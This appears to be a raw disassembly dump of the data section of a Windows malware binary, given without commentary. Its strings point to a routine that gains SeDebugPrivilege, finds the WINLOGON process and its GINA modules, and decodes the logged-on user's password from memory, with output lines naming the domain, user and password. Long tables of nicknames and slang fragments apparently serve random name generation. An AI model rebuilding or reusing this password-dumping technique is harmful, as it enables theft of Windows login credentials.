aUnableToFindTh db 'unable to find the password in memory',0
align 10h
unk_438540 db 2Dh ; - ; DATA XREF: sub_4172C1+117�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
db 57h ; W
db 69h, 6Eh, 4Ch
db 6Fh ; o
db 67h, 6Fh, 6Eh
db 20h
db 49h, 6Eh, 66h
db 6Fh ; o
db 72h, 6Dh, 61h
db 74h ; t
db 69h, 6Fh, 6Eh
db 20h
db 28h, 50h, 49h
db 44h ; D
db 20h, 25h, 64h
db 29h ; )
db 20h, 2Dh, 20h
db 2
db 44h, 6Fh, 6Dh
db 61h ; a
db 69h, 6Eh, 2
db 3Ah ; :
db 20h, 2 dup(5Ch)
db 25h ; %
db 53h, 2Ch, 20h
db 2
db 55h, 73h, 65h
db 72h ; r
db 2, 3Ah, 20h
aSNoPassword_ db '(%S/(no password)).',0
aUserdomain: ; DATA XREF: sub_4172C1+DC�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_4172C1+CE�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_4172C1+9A�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_4172C1+8D�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_4172C1+80�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_4172C1+73�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_4172C1+68�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_4172C1+55�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_4172C1+40�o
; sub_4172C1+161�o ...
align 4
unk_438678 db 2Dh ; - ; DATA XREF: sub_4172C1+35�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aOnlySupportedO db 'only supported on winnt/win2k',0
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_417493+13E�o
align 10h
aNwgina db 'NWGINA',0 ; DATA XREF: sub_417493+123�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_417493+AF�o
align 4
dword_4386C4 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: sub_4178F9+70�o
; sub_417990+C7�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 295325h
dword_438714 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: sub_417990+E1�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 412F4E28h
dd 2929h
off_438768 dd offset aQ ; DATA XREF: sub_417E84+5C�r
; "q"
dd offset dword_439318
dd offset aE ; "e"
dd offset aR ; "r"
dd offset aT ; "t"
dd offset dword_439314
dd offset aU ; "u"
dd offset aI ; "i"
dd offset aP ; "p"
dd offset aA ; "a"
dd offset aS_5 ; "s"
dd offset dword_439310
dd offset dword_43930C
dd offset dword_439308
dd offset dword_439304
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset dword_439300
dd offset dword_4392FC
dd offset dword_4392F8
dd offset aC ; "c"
dd offset aV ; "v"
dd offset dword_4392F4
dd offset aN ; "n"
dd offset aM_0 ; "m"
dd offset dword_4392F0
dd offset dword_4392EC
dd offset dword_4392E8
dd offset dword_4392E4
dd offset dword_4392E0
dd offset word_4392DC
dd offset dword_4392D8
dd offset aI_0 ; "I"
dd offset dword_4392D4
dd offset dword_4392D0
dd offset aA_0 ; "A"
dd offset dword_4392CC
dd offset dword_4392C8
dd offset dword_4392C4
dd offset dword_4392C0
dd offset dword_4392BC
dd offset dword_4392B8
dd offset dword_4392B4
dd offset dword_4392B0
dd offset dword_4392AC
dd offset dword_4392A8
dd offset dword_4392A4
dd offset dword_4392A0
dd offset dword_43929C
dd offset word_439298
dd offset aM_1 ; "M"
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset aAyla ; "AYLA-"
dd offset off_43902C
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_438E98
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
off_438A68 dd offset aSex ; DATA XREF: sub_417E84+41�r
; sub_417E84+EC�r
; "sex"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex_0 ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuvuF ; "||luvu-f|"
dd offset aWiked ; "|wiked|"
dd offset aSick ; "sick}}"
dd offset aQ8 ; "Q8"
dd offset aQ8A ; "|q8|a"
dd offset dword_4392F4
dd offset aC ; "c"
dd offset dword_439310
dd offset aE ; "e"
dd offset dword_43930C
dd offset dword_439308
dd offset dword_439304
dd offset aI ; "i"
dd offset a_ ; "_"
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset dword_439300
dd offset aM_0 ; "m"
dd offset aN ; "n"
dd offset aO ; "o"
dd offset aP ; "p"
dd offset aQ ; "q"
dd offset aRs ; "rs"
dd offset aT ; "t"
dd offset aU ; "u"
dd offset aV ; "v"
dd offset dword_439318
dd offset dword_4392F8
dd offset dword_439314
dd offset dword_4392FC
dd offset aHappy ; "happy"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aSdf ; "sdf"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset dword_4392FC
dd offset dword_439308
dd offset aS_5 ; "s"
dd offset aQ ; "q"
dd offset off_438CB8
dd offset aBbl ; "|bbl"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset a___0 ; "_|_"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset byte_43DB88
dd offset byte_43DB88
dd offset dword_4392C4
dd offset aM_1 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aF_3 ; "^^^f^"
dd offset dword_4392F4
dd offset byte_43DB88
dd offset aSleeping ; "Sleeping"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset aFuck_0 ; "Fuck"
dd offset aFree ; "Free"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset dword_4392A8
dd offset byte_43DB88
dd offset aBoy ; "BOY"
dd offset aGirl_0 ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset aTot_0 ; "tot"
dd offset aLol ; "lol"
dd offset aLoloA ; "lolo|a|"
dd offset aSex4free ; "|sex4free|"
dd offset a4us ; "|4us|"
dd offset a4you ; "{4you}"
dd offset a4u ; "|4u|"
dd offset dword_438C04
dd offset dword_438C00
dword_438C00 dd 7536h ; DATA XREF: .data:00438BFC�o
dword_438C04 dd 7535h ; DATA XREF: .data:00438BF8�o
a4u db '|4u|',0 ; DATA XREF: .data:00438BF4�o
align 10h
a4you db '{4you}',0 ; DATA XREF: .data:00438BF0�o
align 4
a4us db '|4us|',0 ; DATA XREF: .data:00438BEC�o
align 10h
aSex4free db '|sex4free|',0 ; DATA XREF: .data:00438BE8�o
align 4
aLoloA db 'lolo|a|',0 ; DATA XREF: .data:00438BE4�o
aLol db 'lol',0 ; DATA XREF: .data:00438BE0�o
aTot_0 db 'tot',0 ; DATA XREF: .data:00438BDC�o
aMofo db 'mofo',0 ; DATA XREF: .data:00438BD8�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: .data:00438BD4�o
align 4
aMuha db 'muha',0 ; DATA XREF: .data:00438BD0�o
align 4
aYeah db 'yeah',0 ; DATA XREF: .data:00438BCC�o
align 4
aAha db 'aha',0 ; DATA XREF: .data:00438BC8�o
aShit db 'shit',0 ; DATA XREF: .data:00438BC4�o
align 4
aGurl db 'gurl',0 ; DATA XREF: .data:00438BC0�o
align 10h
aGirl_0 db 'GIRL',0 ; DATA XREF: .data:00438BBC�o
align 4
aBoy db 'BOY',0 ; DATA XREF: .data:00438BB8�o
aFree db 'Free',0 ; DATA XREF: .data:00438BA4�o
align 4
aFuck_0 db 'Fuck',0 ; DATA XREF: .data:00438BA0�o
align 4
aSleeping db 'Sleeping',0 ; DATA XREF: .data:00438B94�o
align 4
aF_3 db '^^^f^',0 ; DATA XREF: .data:00438B88�o
align 10h
aSad db 'Sad',0 ; DATA XREF: .data:00438B84�o
aLuvu db 'LUVU',0 ; DATA XREF: .data:00438B80�o
align 4
a___0 db '_|_',0 ; DATA XREF: .data:00438B64�o
aBbl db '|bbl',0 ; DATA XREF: .data:00438B58�o
align 4
off_438CB8 dd offset loc_425240+2 ; DATA XREF: .data:00438B54�o
aMuckc db 'muckc',0 ; DATA XREF: .data:00438B40�o
align 4
aTruck db 'truck',0 ; DATA XREF: .data:00438B3C�o
align 4
aTrimy db 'trimy',0 ; DATA XREF: .data:00438B38�o
align 4
aLuvy db 'luvy',0 ; DATA XREF: .data:00438B34�o
align 4
aUi db 'ui',0 ; DATA XREF: .data:00438B30�o
align 10h
aSdf db 'sdf',0 ; DATA XREF: .data:00438B2C�o
aRt db 'rt',0 ; DATA XREF: .data:00438B28�o
align 4
aGf db 'gf',0 ; DATA XREF: .data:00438B24�o
align 4
aTy db 'ty',0 ; DATA XREF: .data:00438B20�o
align 10h
aRg db 'rg',0 ; DATA XREF: .data:00438B1C�o
align 4
aHappy db 'happy',0 ; DATA XREF: .data:00438B18�o
align 4
aRs db 'rs',0 ; DATA XREF: .data:00438AF8�o
align 10h
aQ8A db '|q8|a',0 ; DATA XREF: .data:00438AB0�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: .data:00438AAC�o
align 4
aSick db 'sick}}',0 ; DATA XREF: .data:00438AA8�o
align 4
aWiked db '|wiked|',0 ; DATA XREF: .data:00438AA4�o
aLuvuF db '||luvu-f|',0 ; DATA XREF: .data:00438AA0�o
align 4
aGens db '{gens|',0 ; DATA XREF: .data:00438A9C�o
align 10h
aSex_0 db '{sex}',0 ; DATA XREF: .data:00438A98�o
align 4
aHub db '{hub}',0 ; DATA XREF: .data:00438A94�o
align 10h
aLuck db '|luck|',0 ; DATA XREF: .data:00438A90�o
align 4
aSuck db '|suck|',0 ; DATA XREF: .data:00438A8C�o
align 10h
aTot db '-|tot|',0 ; DATA XREF: .data:00438A88�o
align 4
aWoh db '|woh|',0 ; DATA XREF: .data:00438A84�o
align 10h
aTambe db '|tambe|',0 ; DATA XREF: .data:00438A80�o
aLag db 'lag',0 ; DATA XREF: .data:00438A7C�o
aBad db 'bad',0 ; DATA XREF: .data:00438A78�o
aTree db 'tree',0 ; DATA XREF: .data:00438A74�o
align 4
aZex db 'zex',0 ; DATA XREF: .data:00438A70�o
aLez db 'lez',0 ; DATA XREF: .data:00438A6C�o
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: .data:00438A64�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: .data:00438A60�o
align 4
aAdamm db 'ADAMM',0 ; DATA XREF: .data:00438A5C�o
align 10h
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: .data:00438A58�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: .data:00438A54�o
align 4
aDallas43m db 'DALLAS43M',0 ; DATA XREF: .data:00438A50�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: .data:00438A4C�o
align 10h
aRerpjj db 'RERPJJ',0 ; DATA XREF: .data:00438A48�o
align 4
aCem39 db 'cem39',0 ; DATA XREF: .data:00438A44�o
align 10h
aCool30m db 'cool30m',0 ; DATA XREF: .data:00438A40�o
aTropikal db 'tropikal',0 ; DATA XREF: .data:00438A3C�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: .data:00438A38�o
align 10h
aNeHaber db 'NE-HABER',0 ; DATA XREF: .data:00438A34�o
align 4
aUla db 'ula',0 ; DATA XREF: .data:00438A30�o
aIzmirlm db 'izmirlm',0 ; DATA XREF: .data:00438A2C�o
aAkden db 'akden',0 ; DATA XREF: .data:00438A28�o
align 10h
aKoray db 'KORAY',0 ; DATA XREF: .data:00438A24�o
align 4
aAta29 db 'Ata29',0 ; DATA XREF: .data:00438A20�o
align 10h
aFirtina db 'firtina',0 ; DATA XREF: .data:00438A1C�o
aAdamm33 db 'AdAMM33',0 ; DATA XREF: .data:00438A18�o
aM41ist db 'M41IST',0 ; DATA XREF: .data:00438A14�o
align 4
aMaxsilla db 'maxsilla',0 ; DATA XREF: .data:00438A10�o
align 4
aAdem28 db 'Adem28',0 ; DATA XREF: .data:00438A0C�o
align 4
aAnkm db 'ankM',0 ; DATA XREF: .data:00438A08�o
align 4
aErkan db 'erkan',0 ; DATA XREF: .data:00438A04�o
align 4
aDevre db 'devre',0 ; DATA XREF: .data:00438A00�o
align 4
aYabanc db 'yabanc',0 ; DATA XREF: .data:004389FC�o
align 4
aBirsen db 'birsen',0 ; DATA XREF: .data:004389F8�o
align 4
aA44m db 'a44m',0 ; DATA XREF: .data:004389F4�o
align 4
aAlcatras db 'alcatras',0 ; DATA XREF: .data:004389F0�o
align 4
off_438E98 dd offset byte_4B5245 ; DATA XREF: .data:004389EC�o
aSevda db 'sevda',0 ; DATA XREF: .data:004389E8�o
align 4
aKotan db 'kotan',0 ; DATA XREF: .data:004389E4�o
align 4
aTegmen db 'TEGMEN',0 ; DATA XREF: .data:004389E0�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: .data:004389DC�o
align 10h
aKapk db 'kapk',0 ; DATA XREF: .data:004389D8�o
align 4
aAngelgirl db 'angelgirl',0 ; DATA XREF: .data:004389D4�o
align 4
aHayran db 'hayran',0 ; DATA XREF: .data:004389D0�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: .data:004389CC�o
align 4
aAnkar db 'Ankar',0 ; DATA XREF: .data:004389C8�o
align 10h
aDjspace db 'DJSPACE',0 ; DATA XREF: .data:004389C4�o
aAnk32M db 'ANK-32-M',0 ; DATA XREF: .data:004389C0�o
align 4
aUmut db 'umut-',0 ; DATA XREF: .data:004389BC�o
align 4
aAdalim db 'ADALIM',0 ; DATA XREF: .data:004389B8�o
align 4
aKumul db 'kumul',0 ; DATA XREF: .data:004389B4�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: .data:004389B0�o
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: .data:004389AC�o
align 10h
aSeviseli db 'SeViSeLi',0 ; DATA XREF: .data:004389A8�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .data:004389A4�o
align 4
aAykut1 db 'aykut1',0 ; DATA XREF: .data:004389A0�o
align 10h
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: .data:0043899C�o
align 10h
aMahinur db 'MAHINUR',0 ; DATA XREF: .data:00438998�o
aHoly db 'holy',0 ; DATA XREF: .data:00438994�o
align 10h
aFlord db 'FLoRD',0 ; DATA XREF: .data:00438990�o
align 4
aKebikec db 'kebikec',0 ; DATA XREF: .data:0043898C�o
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: .data:00438988�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: .data:00438984�o
align 4
aEmre db 'Emre--',0 ; DATA XREF: .data:00438980�o
align 10h
aRamtha db 'RAMTHA',0 ; DATA XREF: .data:0043897C�o
align 4
aImirzali db 'IMIRZALI--',0 ; DATA XREF: .data:00438978�o
align 4
aHakan3 db 'hakan3',0 ; DATA XREF: .data:00438974�o
align 4
aMurat34M db 'murat34-m',0 ; DATA XREF: .data:00438970�o
align 4
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: .data:0043896C�o
aArda db 'arda',0 ; DATA XREF: .data:00438968�o
align 4
aDevran db 'devran',0 ; DATA XREF: .data:00438964�o
align 4
aBerk19m db 'Berk19m',0 ; DATA XREF: .data:00438960�o
aDenizlim db 'DenizliM',0 ; DATA XREF: .data:0043895C�o
align 4
aCongueror db 'CoNGuERoR',0 ; DATA XREF: .data:00438958�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: .data:00438954�o
align 10h
aBogac db 'bogac',0 ; DATA XREF: .data:00438950�o
align 4
aDonjuanm db 'Donjuanm',0 ; DATA XREF: .data:0043894C�o
align 4
aAnkh db 'ankh',0 ; DATA XREF: .data:00438948�o
align 4
off_43902C dd offset byte_457441 ; DATA XREF: .data:00438944�o
aAyla db 'AYLA-',0 ; DATA XREF: .data:00438940�o
align 4
aAlbina db 'albina',0 ; DATA XREF: .data:0043893C�o
align 10h
aIzmir39m db 'Izmir39m',0 ; DATA XREF: .data:00438938�o
align 4
aZack db 'ZACK',0 ; DATA XREF: .data:00438934�o
align 4
aAnk32m db 'ank32m',0 ; DATA XREF: .data:00438930�o
align 4
aTurkyy db 'turkyy',0 ; DATA XREF: .data:0043892C�o
align 4
aAhmet db 'ahmet',0 ; DATA XREF: .data:00438928�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: .data:00438924�o
align 4
aBlackpearl db 'blackpearl',0 ; DATA XREF: .data:00438920�o
align 4
aRetg db 'RETG',0 ; DATA XREF: .data:0043891C�o
align 4
aSamyeli21 db 'samyeli21',0 ; DATA XREF: .data:00438918�o
align 4
aPiramit db 'PIRAMIT',0 ; DATA XREF: .data:00438914�o
aAslii db 'aslii',0 ; DATA XREF: .data:00438910�o
align 4
aErnesto db 'ERNESTO',0 ; DATA XREF: .data:0043890C�o
aHaticem db 'haticem',0 ; DATA XREF: .data:00438908�o
aArzu db 'ARZU',0 ; DATA XREF: .data:00438904�o
align 10h
aSudenur db 'SUDENUR',0 ; DATA XREF: .data:00438900�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .data:004388FC�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .data:004388F8�o
align 10h
aTekir db 'tekir',0 ; DATA XREF: .data:004388F4�o
align 4
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: .data:004388F0�o
align 4
aTrend3 db 'trend3',0 ; DATA XREF: .data:004388EC�o
align 4
aMelekk db 'melekk',0 ; DATA XREF: .data:004388E8�o
align 4
aAkin db 'AKIN',0 ; DATA XREF: .data:004388E4�o
align 4
aMary_0 db 'MARY',0 ; DATA XREF: .data:004388E0�o
align 4
aJericho db 'JERICHO',0 ; DATA XREF: .data:004388DC�o
aTolga34 db 'Tolga34',0 ; DATA XREF: .data:004388D8�o
aMisssunday db 'misssunday',0 ; DATA XREF: .data:004388D4�o
align 10h
aIrmal db 'irmal',0 ; DATA XREF: .data:004388D0�o
align 4
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: .data:004388CC�o
align 4
aBerk19 db 'berk19',0 ; DATA XREF: .data:004388C8�o
align 10h
aHexaaa db 'hexaaa',0 ; DATA XREF: .data:004388C4�o
align 4
aErkan27 db 'erkan27',0 ; DATA XREF: .data:004388C0�o
aKaan38dent db 'kaan38dent',0 ; DATA XREF: .data:004388BC�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: .data:004388B8�o
align 4
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: .data:004388B4�o
align 4
aKencing db 'Kencing',0 ; DATA XREF: .data:004388B0�o
aReshma db 'reshma',0 ; DATA XREF: .data:004388AC�o
align 4
aCamel db 'CAMEL',0 ; DATA XREF: .data:004388A8�o
align 4
aGirl db 'GirL',0 ; DATA XREF: .data:004388A4�o
align 4
aImra db 'imra',0 ; DATA XREF: .data:004388A0�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: .data:0043889C�o
align 4
aPuregold db 'puregold',0 ; DATA XREF: .data:00438898�o
align 4
aKermit db 'kermit',0 ; DATA XREF: .data:00438894�o
align 4
aManee db 'manee',0 ; DATA XREF: .data:00438890�o
align 4
aTroller db 'troller',0 ; DATA XREF: .data:0043888C�o
aLuisa db 'Luisa',0 ; DATA XREF: .data:00438888�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: .data:00438884�o
align 10h
aRimpy db 'rimpy',0 ; DATA XREF: .data:00438880�o
align 4
aJanno db 'janno',0 ; DATA XREF: .data:0043887C�o
align 10h
aBunty db 'bunty',0 ; DATA XREF: .data:00438878�o
align 4
aHeval db 'heval',0 ; DATA XREF: .data:00438874�o
align 10h
aCme db 'cme',0 ; DATA XREF: .data:00438870�o
aMarcy db 'marcy',0 ; DATA XREF: .data:0043886C�o
align 4
aTalika db 'talika',0 ; DATA XREF: .data:00438868�o
align 4
aShez db 'Shez',0 ; DATA XREF: .data:00438864�o
align 4
aKen db 'ken',0 ; DATA XREF: .data:00438860�o
aFlexster db 'flexster',0 ; DATA XREF: .data:0043885C�o
align 4
aKoko db 'koko',0 ; DATA XREF: .data:00438858�o
align 4
aMale db 'male',0 ; DATA XREF: .data:00438854�o
align 4
aSwin db 'swin',0 ; DATA XREF: .data:00438850�o
align 4
aCar1nna db 'Car1nna',0 ; DATA XREF: .data:0043884C�o
aKrizha db 'KRIZHA',0 ; DATA XREF: .data:00438848�o
align 4
aEmilya db 'emilya',0 ; DATA XREF: .data:00438844�o
align 4
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: .data:00438840�o
align 4
aMaxxguy db 'maxxguy',0 ; DATA XREF: .data:0043883C�o
aFarooq db 'farooq',0 ; DATA XREF: .data:00438838�o
align 4
aSmartmir db 'SMARTMIR',0 ; DATA XREF: .data:00438834�o
align 4
aM_1: ; DATA XREF: .data:00438830�o
; .data:00438B7C�o
unicode 0, <M>,0
word_439298 dw 4Eh ; DATA XREF: sub_41A3C6+38�r
; .data:0043882C�o
align 4
dword_43929C dd 42h ; DATA XREF: .data:00438828�o
dword_4392A0 dd 56h ; DATA XREF: .data:00438824�o
dword_4392A4 dd 43h ; DATA XREF: .data:00438820�o
dword_4392A8 dd 58h ; DATA XREF: .data:0043881C�o
; .data:00438BB0�o
dword_4392AC dd 5Ah ; DATA XREF: .data:00438818�o
dword_4392B0 dd 4Ch ; DATA XREF: .data:00438814�o
dword_4392B4 dd 4Bh ; DATA XREF: .data:00438810�o
dword_4392B8 dd 4Ah ; DATA XREF: .data:0043880C�o
dword_4392BC dd 48h ; DATA XREF: .data:00438808�o
dword_4392C0 dd 47h ; DATA XREF: .data:00438804�o
dword_4392C4 dd 46h ; DATA XREF: .data:00438800�o
; .data:00438B78�o
dword_4392C8 dd 44h ; DATA XREF: .data:004387FC�o
dword_4392CC dd 53h ; DATA XREF: .data:004387F8�o
dword_4392D0 dd 50h ; DATA XREF: .data:004387F0�o
dword_4392D4 dd 4Fh ; DATA XREF: .data:004387EC�o
dword_4392D8 dd 55h ; DATA XREF: .data:004387E4�o
word_4392DC dw 59h ; DATA XREF: sub_41A6EA+38�r
; .data:004387E0�o
align 10h
dword_4392E0 dd 54h ; DATA XREF: .data:004387DC�o
dword_4392E4 dd 52h ; DATA XREF: .data:004387D8�o
dword_4392E8 dd 45h ; DATA XREF: .data:004387D4�o
dword_4392EC dd 57h ; DATA XREF: .data:004387D0�o
dword_4392F0 dd 51h ; DATA XREF: .data:004387CC�o
dword_4392F4 dd 62h ; DATA XREF: .data:004387C0�o
; .data:00438AB4�o ...
dword_4392F8 dd 78h ; DATA XREF: .data:004387B4�o
; .data:00438B0C�o
dword_4392FC dd 7Ah ; DATA XREF: .data:004387B0�o
; .data:00438B14�o ...
dword_439300 dd 6Ch ; DATA XREF: .data:004387AC�o
; .data:00438AE0�o
dword_439304 dd 68h ; DATA XREF: .data:004387A0�o
; .data:00438ACC�o
dword_439308 dd 67h ; DATA XREF: .data:0043879C�o
; .data:00438AC8�o ...
dword_43930C dd 66h ; DATA XREF: .data:00438798�o
; .data:00438AC4�o
dword_439310 dd 64h ; DATA XREF: .data:00438794�o
; .data:00438ABC�o
dword_439314 dd 79h ; DATA XREF: .data:0043877C�o
; .data:00438B10�o
dword_439318 dd 77h ; DATA XREF: .data:0043876C�o
; .data:00438B08�o
